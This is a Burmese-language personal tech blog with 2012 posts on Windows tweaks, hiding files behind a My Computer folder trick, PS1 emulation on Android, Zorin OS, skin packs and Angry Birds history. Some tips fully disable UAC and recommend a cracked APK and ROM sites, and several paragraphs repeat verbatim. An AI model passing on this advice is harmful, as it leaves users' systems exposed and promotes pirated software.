Friday, November 2, 2012
Files and Folder ကို Delete လုပ္တဲ႕အခါမွာ ဖ်က္မွာေသခ်ာလားဆိုၿပီးေမးတဲ႕ massage box ကို ေဖ်ာက္ၾကည္႕မယ္............
ကြ်န္ေတာ္ ဘေလာ႕ ပုိ႕စ္ မတင္မိတာလည္းၾကာပါပီ၊ကြ်န္ေတာ္ ေက်ာင္းကိစၥေတြေရာ ရည္းစားစီသြားသြားေတြ႕ေနရတာေရာ :) အင္တာနက္ မရွိတာေရာေၾကာင္႕ပါ
ဒါေပမယ္႕ အခု ကြ်န္ေတာ္ ပို႕စ္ မွန္မွန္ ၿပန္တင္ေပးပါ႕မယ္၊ကြ်န္ေတာ္ စာေတြ မေရးဘဲ အၾကားၾကီးထားခဲ႕မိတဲ႕အတြက္လည္း ေတာင္းပန္ပါတယ္၊လာလည္တဲ႕လူ
ေတြလည္းေက်းဇူးတင္ပါတယ္၊အခု ကြ်န္ေတာ္ေၿပာၿပမယ္႕ နည္းေလးကေတာ႕ ကြ်န္ေတာ္တို႕ files ေတြမလိုခ်င္ေတာ႕လို႕ဖ်က္(delete)လုပ္တဲ႕အခါမွာ ဖ်က္မွာ
ေသခ်ာလားလို႕ေမးတဲ႕ massage box ကို ေဖ်ာက္မယ္႕ နည္းေလးပါ၊ပထမဆံုး Recycle Bin ကို right click ႏွိပ္လိုက္ပါ ေနာက္ပီး propreties ကို ႏွိပ္ပါ
display delete configuration dialog ဆိုတဲ႕စာတမ္းေလးကို အမွန္ၿခစ္္ၿဖဳတ္ေပးလိုက္ပါ ေနာက္ပီးရင္ apply ႏွိပ္ ok လုပ္လိုက္ရင္ ရပါပီ.............
သူမ်ားေတြမၿမင္ေအာင္ ပံုေၿပာင္း ေဖ်ာက္မယ္..........
ကြ်န္ေတာ္တို႕ ဒီတစ္ေခါက္ ဖိုင္ေလးေတြကို တၿခား program ေလးေတြအၿဖစ္နဲ႕ဖြက္ထားရေအာင္၊ဖိုင္ေလးေတြကလည္း ဖြက္ထားဖို႕လိုတာကိုးဗ်၊ကြ်န္ေတာ္ဆို hidden လုပ္ထားလို႕လည္း
မရဘူး hidden ဘယ္လိုေဖာ္ရတယ္ဆိုတာ ကြ်န္ေတာ္ ညီေရာ၊အစ္ကိုေတြေရာ၊အစ္မေတြေရာ........ပာီးးပာီးး ရည္းစားကအစသိတယ္၊password ေပးထားၿပန္ေတာ႕လည္း ဇြတ္ေၿပာခိုင္း
တာ.........:) ကဲထားလိုက္ပါေတာ႕ ကြ်န္ေတာ္လိုလူေတြအတြက္ ဒီနည္းက အသံုး၀င္ဆံုးဘဲ ကြ်န္ေတာ္ရည္းစားေတာ႕မသိေစနဲ႕ဗ်ာ :)
အေရးၾကီးဆံုးလိုတာက winrar ဆိုတဲ႕ ဖိုင္ခ်ဴံ႕ခ်ဲေဆာ႔၀ဲလ္ေလးဗ်၊မရွိရင္ ဒီမွာ ေဒါင္းလုပ္ လုပ္လိုက္ဗ်ာ
စလုပ္ၾကည္႕ရေအာင္ new folder တစ္ခုေဆာက္လိုက္ပါ ၊အဲ Folder ထဲကို သူငယ္ခ်င္းတို႔ ဖြက္ခ်င္တဲ႕ ပာိုဖိုင္ ဒီဖိုင္ ပာိုပံု ပာိုmovie ေတြကိုေကာ္ပီထည္႕လိုက္ပါ :)
ေနာက္ပီး အဲ ဖိုဒါေလးကို ကလစ္ေထာက္ပီး F2 ႏွိပ္လိုက္ပါ၊ဒါမွမပာုတ္ properties ကို right click ႏွိပ္ပီး rename ႏွိပ္လိုက္ပါ(rename နဲ႕F2 က အတူတူဘဲဗ်)
ေနာက္ပီး ေအာက္က My Computer.{20D04FE0-3AEA-1069-A2D8-08002B30309D} ကို copy လုပ္ပီး past လုပ္ထည္႕ေပးလိုက္ပါ ေပာာ ကြ်န္ေတာ္တို႕ရဲ႕
Folder ေလး My Computer ပံုေလးၿဖစ္သြားပီ ၊ကလစ္ႏွိပ္၀င္ၾကည္႕လိုက္ပါအုန္း My Computer ထဲကိုဘဲ၀င္သြားတယ္ေနာ္..............ပာီးးး ကြ်န္ေတာ္တို႕ ထည္႕ထား
တဲ႕ဖိုင္ေတြဘယ္ေရာက္ကုန္ပီလည္း မပူပါနဲ႕ အဲဒီ My Computer ေလးကို right click ႏွိပ္ပီး add to archive.. ဆိုတာေလးႏွိပ္ေပးလိုက္ပါ My Computer နာမည္နဲ႕
winrar ဖိုင္ေလး ေတြ႕ရပါလိမ္္႕မယ္ အဲဒီမွာ ကလစ္ႏွစ္ခ်က္ႏွိပ္၀င္လိုက္ပါ My Computer ဆိုတဲ႕ဖိုင္ေလးေတြ႕ပါလိမ္႕မယ္ အဲထဲကိုထပ္၀င္လိုက္
ေပာာ.........ကြ်န္ေတာ္တို႕ဖြက္ထားတဲ႕ ဗီဒီယိုေတြေတြ႕ပီ အဲ.... ဖိုင္ေတြကိုေၿပာပါတယ္၊ ေအာက္မွာ ေၿပာင္းလို႕ရမယ္႕ ကုတ္ေလးေတြထည္႕ေပးထားတဲ႕ေၿပာင္းၾကည္႕
ေပါ႕ေနာ္ အဆင္ေၿပပါေစ.................။
မရဘူး hidden ဘယ္လိုေဖာ္ရတယ္ဆိုတာ ကြ်န္ေတာ္ ညီေရာ၊အစ္ကိုေတြေရာ၊အစ္မေတြေရာ........ပာီးးပာီးး ရည္းစားကအစသိတယ္၊password ေပးထားၿပန္ေတာ႕လည္း ဇြတ္ေၿပာခိုင္း
တာ.........:) ကဲထားလိုက္ပါေတာ႕ ကြ်န္ေတာ္လိုလူေတြအတြက္ ဒီနည္းက အသံုး၀င္ဆံုးဘဲ ကြ်န္ေတာ္ရည္းစားေတာ႕မသိေစနဲ႕ဗ်ာ :)
အေရးၾကီးဆံုးလိုတာက winrar ဆိုတဲ႕ ဖိုင္ခ်ဴံ႕ခ်ဲေဆာ႔၀ဲလ္ေလးဗ်၊မရွိရင္ ဒီမွာ ေဒါင္းလုပ္ လုပ္လိုက္ဗ်ာ
စလုပ္ၾကည္႕ရေအာင္ new folder တစ္ခုေဆာက္လိုက္ပါ ၊အဲ Folder ထဲကို သူငယ္ခ်င္းတို႔ ဖြက္ခ်င္တဲ႕ ပာိုဖိုင္ ဒီဖိုင္ ပာိုပံု ပာိုmovie ေတြကိုေကာ္ပီထည္႕လိုက္ပါ :)
ေနာက္ပီး အဲ ဖိုဒါေလးကို ကလစ္ေထာက္ပီး F2 ႏွိပ္လိုက္ပါ၊ဒါမွမပာုတ္ properties ကို right click ႏွိပ္ပီး rename ႏွိပ္လိုက္ပါ(rename နဲ႕F2 က အတူတူဘဲဗ်)
ေနာက္ပီး ေအာက္က My Computer.{20D04FE0-3AEA-1069-A2D8-08002B30309D} ကို copy လုပ္ပီး past လုပ္ထည္႕ေပးလိုက္ပါ ေပာာ ကြ်န္ေတာ္တို႕ရဲ႕
Folder ေလး My Computer ပံုေလးၿဖစ္သြားပီ ၊ကလစ္ႏွိပ္၀င္ၾကည္႕လိုက္ပါအုန္း My Computer ထဲကိုဘဲ၀င္သြားတယ္ေနာ္..............ပာီးးး ကြ်န္ေတာ္တို႕ ထည္႕ထား
တဲ႕ဖိုင္ေတြဘယ္ေရာက္ကုန္ပီလည္း မပူပါနဲ႕ အဲဒီ My Computer ေလးကို right click ႏွိပ္ပီး add to archive.. ဆိုတာေလးႏွိပ္ေပးလိုက္ပါ My Computer နာမည္နဲ႕
winrar ဖိုင္ေလး ေတြ႕ရပါလိမ္္႕မယ္ အဲဒီမွာ ကလစ္ႏွစ္ခ်က္ႏွိပ္၀င္လိုက္ပါ My Computer ဆိုတဲ႕ဖိုင္ေလးေတြ႕ပါလိမ္႕မယ္ အဲထဲကိုထပ္၀င္လိုက္
ေပာာ.........ကြ်န္ေတာ္တို႕ဖြက္ထားတဲ႕ ဗီဒီယိုေတြေတြ႕ပီ အဲ.... ဖိုင္ေတြကိုေၿပာပါတယ္၊ ေအာက္မွာ ေၿပာင္းလို႕ရမယ္႕ ကုတ္ေလးေတြထည္႕ေပးထားတဲ႕ေၿပာင္းၾကည္႕
ေပါ႕ေနာ္ အဆင္ေၿပပါေစ.................။
PS1 ဂိမ္းေတြ android ေပၚမွာေဆာ႕ရေအာင္.............
ကြ်န္ေတာ္ အခုေၿပာၿပမယ္႕ ပာာေလးက သိၿပီးသားလည္းၿဖစ္ရင္ၿဖစ္မွာပါ ၊ဒါေပမယ္႕ မသိေသးတဲ႕လူေတြအတြက္ ကြ်န္ေတာ္ တင္လိုက္တာပါ။
အခု ပထမ ဆံုး သူငယ္ခ်င္းတို႕လုပ္ရမွာက ကြ်န္ေတာ္ ေပးထားတဲ႕ rar ဖိုင္ေလးကို ေဒါင္းလုပ္ဆြဲဖို႕ပါ
ဒီမွာDownload လုပ္ပါ၊ေနာက္ပီး ရင္ rar ဖိုင္ေလးကို ၿဖည္လိုက္ပါ။ အဲထဲမွာ apk ဖိုင္ရယ္ bin ဖိုင္ရယ္
rom download ဆိုတဲ႕ txt ဖိုင္ေလးရယ္ပါပါတယ္၊အဲထဲက apk ဖိုင္ေလး ကို ဖုန္းထဲထည္႕ပီး install
လုပ္လိုက္ပါ(cracked ေလးပါ root လည္းမလုိပါဘူး) ေနာက္ပီး SD card ထဲမွာ bin ဖိုင္ေလးထည္႕လိုက္
ပါ၊ေစာေစာက install လုပ္ထားတဲ႕ ေဆာ႕၀ဲလ္ေလးကုိ run လိုက္ပါ bin ဖိုင္ေလးကို ေရႊးၿပီးဖြင္႕လိုက္ပါ
ဒါဆိုရပါပီ၊ ဂိမ္း rom ေတြကိုေတာ႕
(1)http://www.coolrom.com/roms/psx/
(2)http://www.freeroms.com/psx.htm
အေပၚက လိပ္စာေတြမွာ ေဒါင္းလိုက္ပါ ၊စိုက္ပ်ဴိးေရးက အရမ္းေဆာ႕လို႕ေကာင္းတယ္ဗ်၊ေနာက္ပီး တာဇံ လည္းမိုက္တယ္................ပာိပာိ အဆင္ေၿပပါေစဗ်ာ၊အဆင္မေၿပရင္လည္း dead4mm@gmail.com ကို ေမးႏိုင္ပါတယ္၊ ဂိမ္း pad settings ေတြအေၾကာင္းလည္းေရးမွာပါ၊ေနာက္ပီး PS1 ေတြကို PC ေပၚမွာ
ေဆာ႕လို႕ရတဲ႕ EMU ေတြအေၾကာင္းလည္းေရးမွာပါ။
အခု ပထမ ဆံုး သူငယ္ခ်င္းတို႕လုပ္ရမွာက ကြ်န္ေတာ္ ေပးထားတဲ႕ rar ဖိုင္ေလးကို ေဒါင္းလုပ္ဆြဲဖို႕ပါ
ဒီမွာDownload လုပ္ပါ၊ေနာက္ပီး ရင္ rar ဖိုင္ေလးကို ၿဖည္လိုက္ပါ။ အဲထဲမွာ apk ဖိုင္ရယ္ bin ဖိုင္ရယ္
rom download ဆိုတဲ႕ txt ဖိုင္ေလးရယ္ပါပါတယ္၊အဲထဲက apk ဖိုင္ေလး ကို ဖုန္းထဲထည္႕ပီး install
လုပ္လိုက္ပါ(cracked ေလးပါ root လည္းမလုိပါဘူး) ေနာက္ပီး SD card ထဲမွာ bin ဖိုင္ေလးထည္႕လိုက္
ပါ၊ေစာေစာက install လုပ္ထားတဲ႕ ေဆာ႕၀ဲလ္ေလးကုိ run လိုက္ပါ bin ဖိုင္ေလးကို ေရႊးၿပီးဖြင္႕လိုက္ပါ
ဒါဆိုရပါပီ၊ ဂိမ္း rom ေတြကိုေတာ႕
(1)http://www.coolrom.com/roms/psx/
(2)http://www.freeroms.com/psx.htm
အေပၚက လိပ္စာေတြမွာ ေဒါင္းလိုက္ပါ ၊စိုက္ပ်ဴိးေရးက အရမ္းေဆာ႕လို႕ေကာင္းတယ္ဗ်၊ေနာက္ပီး တာဇံ လည္းမိုက္တယ္................ပာိပာိ အဆင္ေၿပပါေစဗ်ာ၊အဆင္မေၿပရင္လည္း dead4mm@gmail.com ကို ေမးႏိုင္ပါတယ္၊ ဂိမ္း pad settings ေတြအေၾကာင္းလည္းေရးမွာပါ၊ေနာက္ပီး PS1 ေတြကို PC ေပၚမွာ
ေဆာ႕လို႕ရတဲ႕ EMU ေတြအေၾကာင္းလည္းေရးမွာပါ။
Tuesday, August 14, 2012
linux အႏြယ္၀င္ ubuntu အေၿခခံ window အသံုးၿပဳသူမ်ားအတြက္ Zorin OS 6
အရင္က Linux ေတာ႕သံုးခ်င္တယ္ မသံုးတတ္ဘူးဆိုပီးေတာ႕ အခက္ခဲၿဖစ္ေနတဲ႕
linux စသံုးသူေတြကြ်န္ေတာ္ေတြ႕ဘူးပါတယ္၊ubuntu လို အရမ္းရိုးရွင္းတဲ႕ Linux
ကိုေတာင္ သူတို႕ေတြမွာ ခက္ခဲရွာပါတယ္၊သူတို႕အၿပစ္မဟုတ္ပါ ကြန္ပ်ဴတာစကိုင္
ကတည္းက မိုက္ကရိုေဆာ႕ရဲ႕ window က ကိုးကြယ္ရာဘာသာတရားတစ္ခုလို
ကပ္ပါလာတာမလို႕ပါ၊ကြ်န္ေတာ္လည္း Linux ကိုေလ႕လာေနတဲ႕လူပါ၊တစ္ဆင္႔ခ်င္းေလ႕လာေနတာပါ၊အခု
Zorin OS6 က Linux OS တစ္ခုၿဖစ္ၿပီး Window အသံုးၿပဳသူေတြကိုအရမ္းအဆင္
ေၿပေစမယ္႕ OS တစ္ခုၿဖစ္ပါတယ္.........................
အၿခားေသာ interface ေတြကိုလည္းထည္႕ေပးထားပါတယ္ Zorin Look Changer
မွာ Window XP,Mac OSX,GNOME တို႕ကိုေရြးၿပီးသံုးႏိုင္ပါေသးတယ္၊ေနာက္ပီး
Zorin OS6 မွာ Chrome browser,LiberOffice,Thunderbird နဲ႕ GIMP ကဲ႕သို႕အသံုး
၀င္ပရိုဂရမ္မ်ားပါ၀င္တဲ႕အၿပင္ iTunes အပါအ၀င္window ေဆာ႕၀ဲလ္ေတြကိုသံုးႏိုင္မယ္႕
wine ကဲ႕သို႕ေသာ Play ONLinux ကိုလည္းထည္႕သြင္းေပးထားပါတယ္။Zorin OS6
ကို 32bit/64bit ဆိုၿပီး Free ရယူႏိုင္ပါတယ္၊အရမ္းနိမ္႕တဲကြန္ပ်ဴတာေတြအတြက္လည္း
Lite ဆိုၿပီးရယူႏိုင္ပါေသးတယ္၊ ေလ႕လာခ်င္တဲ႕ သူငယ္ခ်င္းေတြ ၿမန္ၿမန္ေလးေဒါင္းလုပ္
ဆြဲလိုက္ပါအုန္းေနာ္............
ဒီမွာေဒါင္းလုပ္ ဆြဲလိုက္ပါေနာ္
Thursday, July 19, 2012
ကြန္ပ်ဴတာ ဒီဇိုင္းလွလွေလးေတြၾကိဳက္တဲ႕ သူငယ္ခ်င္းတို႕အတြက္ အရမ္းမိုက္တဲ႕ ဆိုဒ္ေလးတစ္ခုပါ
ကြ်န္ေတာ္ အခုေတြ႕ထားတဲ႕ဆိုဒ္ေလးက window ကို ပံုစံလွလွေလးၿဖစ္ေအာင္လုပ္ေပးမယ္႕ အေပၚခြံေလးေတြ ရွိတဲ႕ဆိုဒ္ပါ ၊ေတာ္ေတာ္ေလးမိုက္ပါတယ္ ကြ်န္ေတာ္ကေတာ႕ ပံုစံလွလွေလး
ၾကိဳက္တတ္တဲ႕လူဆိုေတာ႕တအားကိုသေဘာက်တယ္၊ ပံုစံလွလွသာၾကိဳက္တာ ကြ်န္ေတာ္ရည္း
စားကေတာ႕ရုပ္ဆိုးတယ္ (ဟဲဟဲ ေနာက္တာပါ) ကိုယ္႕လွဖို႕အေရးၾကီးတာေနာ႕ :D..................
ဒီဆိုဒ္ေလးမွာရွိတဲ႕ skinpack ေလးေတြကေတာ္ေတာ္မိုက္တယ္ဗ်ာ window ကို ubuntu 11.10/12.4 စတဲ႕
ubuntu နဲ႕တပံုတည္းတူေအာင္လုပ္ထားတဲ႕ဟာလည္းရွိတယ္၊android ပံုစံလည္းရွိတယ္၊ကြ်န္ေတာ္ အခု
ကြ်န္ေတာ္႕ကြန္ပ်ဴတာမွာတင္ထားတဲ႕ဟာကေတာ႕ iOS ပံုစံေပါ႕ဗ်ာ ဟီးးးးးးးးးး
မိုက္တယ္မလား................တၿခားမိုက္တဲ႕ဟာေတြရွိေသးတယ္ဗ်ာ
ကဲ သြားၾကည္႕လိုက္ပါအုန္း.......................ဒီမွာ ေဒါင္းလုပ္ ဆိုဒ္ကေတာ႕ၾကီးတယ္ဗ် တစ္ခုကို 41.5mb ေလာက္ရွိၾကတယ္။ ကြ်န္ေတာ္ ဆုေတာင္းေပးေနၾကလိုဘဲ အဆင္ေၿပပါေစဗ်ာ :)
Saturday, July 7, 2012
internet speed ၾကည္႕လို႕ရႏိုင္မယ္႕ window7 gadget ေလး..........
အင္တာနက္အသံုးၿပဳသူတိုင္းဟာ ကိုယ္႕ရဲ႕အင္တာနက္ႏႈန္းဘယ္
ဘယ္ေလာက္ရွိလည္းသိခ်င္မွာပါ.......ကဲ IP ေတြကိုေတာင္
ၾကည္႕လို႕ရတယ္ မိုက္တယ္မလား..................
ေဒါင္းလုပ္ဆြဲခ်င္ရင္ေတာ႕.......ဒီမွာဆြဲပါ
သူ႕ရဲ႕မႈရင္းဆိုဒ္ကေတာ႕ဗ်ာ ....http://addgadgets.com/network_meter/
ဘယ္ေလာက္ရွိလည္းသိခ်င္မွာပါ.......ကဲ IP ေတြကိုေတာင္
ၾကည္႕လို႕ရတယ္ မိုက္တယ္မလား..................
ေဒါင္းလုပ္ဆြဲခ်င္ရင္ေတာ႕.......ဒီမွာဆြဲပါ
သူ႕ရဲ႕မႈရင္းဆိုဒ္ကေတာ႕ဗ်ာ ....http://addgadgets.com/network_meter/
Tuesday, June 26, 2012
Angry Bird အေၾကာင္းကို ကြ်န္ေတာ္သိသမွ်ေလး..................
စိတ္စိုးေနတဲ႕ငွက္ရုပ္ေလး ကို မသိတဲ႕လူေတာ႕မရွိေလာက္ဘူးထင္ပါတယ္၊သူ႕ရဲ႕လႊမ္းမိုးမႈက အက်ီေတြ၊ေက်ာပိုးအိတ္ေတြနဲ႕အၿခားကုန္ပစၥည္း ေပၚမွာေရးထိုးေရာင္းေလာက္တဲ႕အထိကို
ေအာင္ၿမင္တာပါ၊ဒီေကာင္ေလးရဲ႔အေၾကာင္းကို ကြ်န္ေတာ္ သိသမွ်ေလးေၿပာၿပခ်င္ပါတယ္..................
Angry Bird ဂိမ္းပာာ Rovio Mobile က ထုတ္လုပ္တဲ႕ puzzle game အမ်ိဳးအစားၿဖစ္ပါတယ္၊ဂိမ္းကိုစတင္
ေရးဆဲြခ်ိန္က အက္ပဲ အိုင္အိုအက္ ပလက္ေဖာင္းအၿဖစ္စတင္ထုတ္လုပ္ခဲ႕တာၿဖစ္ပါတယ္၊2011 ခုႏွစ္မွာ
အက္ပဲ စတိုးမွာ အခုေရ 12 သန္းေက်ာ္ေရာင္းခဲ႕ရတဲ႕အေရာင္းရဆံုးဂိမ္းၿဖစ္ပါတယ္၊အဲဒီေနာက္မွာေတာ႕
၀င္းဒိုး၊အန္ဒရြိဳက္ နဲ႕ အိုင္အိုအက္ပလက္ေဖာင္းေတြမွာ ပါ ေဆာ႕ႏိုင္ေအာင္ေရးဆြဲထုတ္လုပ္ခဲ႕ပါတယ္၊
အန္ဒရြိဳက္ဖုန္း၊အန္ဒရိြဳက္တက္ပလက္နဲ႕အိုင္ဖုန္းအိုင္ေပါ႔၊အိုင္ပက္ တို႕မွာ မပါမၿဖစ္ဂိမ္းတစ္ခုၿဖစ္လာပါတယ္။
Angry Bird ကို စတင္ၿခင္း
Rovio Mobile က 2009 အေစာပိုင္းမွာဂိမ္းအသစ္ဖန္တီးဖို႕စီစဥ္ခဲ႕ၾကရာ ၀န္ထမ္းမ်ားက ေခါင္းဘဲပါတဲ႕ငွက္ရုပ္ ကို တင္ညပခဲ႕ၾကပါတယ္၊ေနာက္ၿပီး အဲငွက္က စိတ္စိုးေနပံုေပါက္လို႕
Angry Bird လို႕ေပးခဲ႕တာပါ။
Angry Bird ငွက္အမ်ဴိးအစား သတ္မွတ္ရာမွာေတာ႕ ေရးဆြဲခဲ႕တဲ႕ ပထမ ဦးဆံုးအနီးစပ္ဆံုးငွက္ပံုအၿဖစ္
သစ္ေတာက္ငွက္ပံုေရးဆြဲခဲ႕ပါတယ္၊ေနာက္ၿပီး ထိုေနာက္မွာေတာ႕ လည္းေကာင္းဂိမ္းဖန္တီးသူတို႕က
ဘဲတၿခားငွက္ ကိုးေကာင္ကို ဖန္တီးခဲ႕တာပါ။
Angry Bird စိတ္စိုးရတာကေတာ႕ သူ႕ရဲ႕ဥေတြအစားခံရလို႕ စိတ္စိုးတယ္လို႕ နာမည္တတ္ခဲ႕ပါတယ္၊ေနာက္
ရန္သူအေနနဲ႕၀က္ရုပ္ထားတာကေတာ႕ ကမာၻအႏွံ႕အၿပားမွာ ၀က္တုတ္ေကြးေတြကိုေၾကာက္ေနရတာေၾကာင္႕ ရန္သူကို ၀က္လို႕သတ္မွတ္လိုက္တာပါ၊ဒါေၾကာင္႕
၀က္တစ္ေကာင္က သစ္ပင္ေပၚကို ဥေတြတတ္ခိုးစားတာကို တိုက္ခိုက္တဲ႕ဂိမ္းအၿဖစ္ေရးဆြဲလိုက္ပါတယ္၊
ဒါေပမယ္႕ ကမာၻအႏွံ႕အၿပားက ဂိမ္းမာ ေတြက ၀က္က သစ္ပင္ဘယ္လိုလို႕တတ္ႏိုင္သလဲလို႕ ေ၀ဖန္
ၾကတာေၾကာင္႕ ဒုတိယအၾကိမ္ဂိမ္းထုတ္လုပ္တဲ႕အခါမွာေတာ႕ ၀က္ က ဗီလိန္ၿဖစ္မလာေတာ႕ဘဲ
Angry Bird က သာ ကယ္တင္ရွင္ၿဖစ္လာခဲ႕ပါတယ္၊ဒီဂိမ္းၿဖစ္ေၿမာက္ေရးအတြက္ စုစုေပါင္းကုန္က်စရိတ္မွာ
ယူရိုတစ္သိန္းေက်ာ္ကုန္က်ခဲ႕ပါတယ္။အခုခ်ိန္ထိလူၾကိဳက္မ်ားေအာင္ၿမင္ေနတ႔ဲဂိမ္းၿဖစ္ပါတယ္။
ကြန္ပ်ဴတာကိုၿမန္ေစမယ့္နည္းလမ္းမ်ား....................................
ငါကြန္ပ်ဴတာအရမ္းေလးေနတယ္ကြာ လို႕ သူငယ္ခ်င္းတစ္ေယာက္က ကြ်န္ေတာ္ ကို လာေၿပာလုိ႕ ကြ်န္ေတာ္ သူ႕အိမ္ကိုလိုက္သြားၿပီး
သူငယ္ခ်င္းရဲ႕ကြန္ပ်ဴတာကိုလိုက္ၾကည့္ပါတယ္၊သူ႕ရဲ႕ကြန္ပ်ဴတာက
Processor- Intel(R) Core(TM)2 Duo CPU E7400 @2.80GHz 2.79GHz
RAM - 2.00GB
window7 32-bit နဲ႕ၿဖစ္ပါတယ္၊ အေတာ္အသင္႕ေကာင္းမြန္တဲ႕ကြန္ပ်ဴတာလို႕ဆိုႏိုင္ပါတယ္၊ဒါေပမယ့္ တကယ္ကိုေလးေနတာပါ၊လုပ္ေဆာင္ခ်က္အားလံုးေလးကန္
ေနပါတယ္၊အဲဒါကေတာ့ အသံုးၿပဳသူရဲ႕အၿပစ္ပါ temp ဖိုင္ junk ဖိုင္ registry နဲ႕တၿခားမလိုအပ္ေသာဘာဖိုင္ကိုမွ သူမရွင္းလင္းခဲ႕ပါ၊anti-virus ကိုလည္း update
မလုပ္ဘဲထားပါတယ္၊ေနာက္ပီး ၀ယ္ထားကတည္းက Hard drive ကို သန္႕ရွင္းေရးမလုပ္ပါ ဘာဆိုဘာမွ သူမလုပ္ဘဲထားပါတယ္၊ ကြ်န္ေတာ္ သူ႕ကိုအၿပစ္မေၿပာပါ
beginner တစ္ဦးအတြက္ ၿဖစ္တတ္တဲ႕သေဘာေတြပါ၊ကြ်န္ေတာ္တုန္းကလည္းအဲလိုပါဘဲ ..... ဟိဟိ ကဲ............ ကြ်န္ေတာ္တို႕ ကြန္ပ်ဴတာကို အၿမန္ႏႈန္းၿမင့္ရေအာင္
(၁)Search Indexing Feature ကိုၿပင္ဆင္ၿခင္း
start(window key) ကိုႏွိပ္ computer ကို right ckick ႏွိပ္ Manage ကိုကလစ္ပါ
Manage ေပၚလာတဲ့အခါမွာေတာ့ ဘယ္ဘက္အကြက္ထဲမွ Services and Applications
ကိုေရႊးပါ Services ကိုထပ္ေရႊးပါ၊ထိုေနာက္ ညာဘက္မွ Window Search ကို ကလစ္ႏွစ္
ခ်က္ႏွိပ္ပီး Automatic(Delayed Start) ကို Disabled လုပ္ပီး Apply ႏွိပ္ OK လိုက္ပါ။
(၂)UAC ကိုၿပင္ဆင္ၿခင္း
start(window key) ကိုႏွိပ္ပါ uac လို႕ရိုက္ထည့္ပါ enter ေခါက္ပါ အတံုးေလးကိုေအာက္
ဆံုးအထိ ဆြဲခ်လိုက္ပါ၊massage box တတ္လာလွ်င္လည္း OK ႏွိပ္ေပးလိုက္ပါ
(သတိၿပဳရမွာက-လိုင္စင္ window အစစ္အသံုးၿပဳသူမ်ားမၿပဳလုပ္သင္႕ပါ၊တစ္ေခြတစ္
ေထာင္ crack သမားမ်ားကေတာ့ ၿပသာနာမရွိပါဘူး)
(၃)အသံုးမၿပဳလိုေသာ applications မ်ားကိုပိတ္ထားၿခင္း
start(window key) ကိုႏွိပ္ control panel ကိုႏွိပ္ပါ၊Programs ကိုေရႊးပါ၊Programs and Features
ကိုထပ္ႏွိပ္ပါ၊ Turn Windows Features on or off ကို ကလစ္ပါ၊အဲဒီမွာ ဂိမ္းမွာရွိေသာအမွန္ၿခစ္ေလး
ကိုၿဖဳတ္ပါ၊Media Features ေရွ႕တြင္ရွိေသာ(+)အေပါင္းေလးကိုကလစ္ၿပီးဖြင့္လိုက္ပါ၊Windows DVD
Maker ႏွင့္ Windows Media Center ေရွ႕မွ အမွန္ၿခစ္ေလးမ်ားၿဖဳတ္လိုက္ပါ၊ကဲ.....OKႏွိပ္လိုက္ပါ၊
(သတိၿပဳရမွာက ကြ်န္ေတာ္ၿဖဳတ္ခိုင္းတဲ့ဟာေတြကိုသာၿဖဳတ္တာေကာင္းပါတယ္ က်န္တာေတြက
system နဲ႕ဆိုင္တဲ့အတြက္ မၿဖဳတ္တာေကာင္းပါတယ္)
(၄)Aero Peek and Aero Snap features ကို Disable ၿပဳလုပ္ၿခင္း
start(window key) ကိုႏွိပ္ control panel ကိုႏွိပ္ပါ၊Ease of Access ကိုေရြးခ်ယ္ပါ၊ထိုေအာက္မွ
Ease of Access Center ကိုဖြင့္ပါ ဖြင္႕ၿပီးရင္ေတာ့ Make it easier to focus on tasks ကိုကလစ္ပါ
Prevent windows from being automatically arranged when moved to the edge of the
screen ကို အမွန္ၿခစ္ၿဖဳတ္လိုက္ပါ၊Ok ႏွိပ္ပါ၊ထို႔ေနာက္ right click ႏွိပ္ကာ Personalize ကိုႏွိပ္လိုက္ပါ
ညာဘက္ရွိ Taskbar and Start Menu ကို ကလစ္ႏွိပ္ပါ ထိုေနာက္ use Aero Peek to preview the
desktop ကို အမွန္ၿခစ္ၿဖဳတ္လိုက္ပါ၊Apply ႏွိပ္ OKႏွိပ္ပါ၊
(၅)Hight performance ကိုအသံုးၿပဳၿခင္း
start(window key) ကိုႏွိပ္ control panel ကိုႏွိပ္ပါ၊ System and Security ကိုဖြင့္ပါ၊Power Options ကိုႏွိပ္ပါ
Hight performance ကိုေၿပာင္းလိုက္ပါ၊OK လိုက္ပါ။
(၆)Disable Unwanted System Sounds in Windows7
run box ေခၚပါ (window key +R) window key နဲ႕ R ကိုတြဲႏွိပ္လွ်င္ run box ေပၚလာပါၿပီ
ဒါဆို mmsys.cpl ရိုက္ၿပီး enter ေခါက္ပါ sond ေပၚလာပါပီ ၊sounds ကိုေရြးပါထို႕ေနာက္
windows default ေနရာတြင္ no sound ကို ေရြးကာ Apply ႏွိပ္ပါ။
(၇)Start Up program မ်ားကို Disable လုပ္ၿခင္း
run box ေခၚပါ (window key +R) window key နဲ႕ R ကိုတြဲႏွိပ္လွ်င္ run box ေပၚလာပါၿပီ
ဒါဆို msconfig ကိုထည့္သြင္းၿပီး enter ေခါက္ပါ startup ကိုေရြးပါ ၊antivirus program မ်ားမွ
လြဲရင္ တၿခားဟာ အမွန္ၿခစ္ၿဖဳတ္လိုက္ပါ၊Apply ကိုႏွိပ္ပါ၊OK လုပ္လိုက္ပါ ၊ restart ခ်လိုက္ပါ။
(၈)Softwares မ်ားအသံုးၿပဳၿခင္းၿဖင့္ မလိုအပ္ေသာဖိုင္မ်ားရွင္းထုတ္ၿခင္း
Cclear ေဆာ့၀ဲလ္ကိုအသံုးၿပဳၿခင္းၿဖင့္ မလိုအပ္ေသာဖိုင္မ်ားကိုရွင္းထုတ္ႏိုင္တယ္
ဒီမွာေဒါင္းပါ
Auslogics Disk Defrag ကိုအသံုးၿပဳၿခင္းၿဖင့္ Hard Disk တြင္းဖိုင္မ်ားအစီအစဥ္တ
က်ၿပဳလုပ္ကာ၊ကြန္ပ်ဴတာၿမန္ေစသည္။
ဒီမွာေဒါင္းပါ
antivirus တစ္ခုခုအသံုးၿပဳပါ၊အလကားရတဲ႕ဟာေတြရွိပါတယ္ေကာင္းလည္းေကာင္းပါ
တယ္၊ေနာက္ antivirus တင္ပီးသြားရင္လည္း ဒီအတိုင္းမေနပါနဲ႕ update လုပ္ပါ၊scan
ဖတ္ပါ၊ေန႕တိုင္းမဟုတ္ေတာင္ ၁ လတစ္ခါေလာက္ဘဲၿဖစ္ၿဖစ္ေပါ့ေနာ္
anti-virus ေဆာ့၀ဲလ္ေတြကိုေတာ့ ဒီမွာၾကည့္ပါ...........
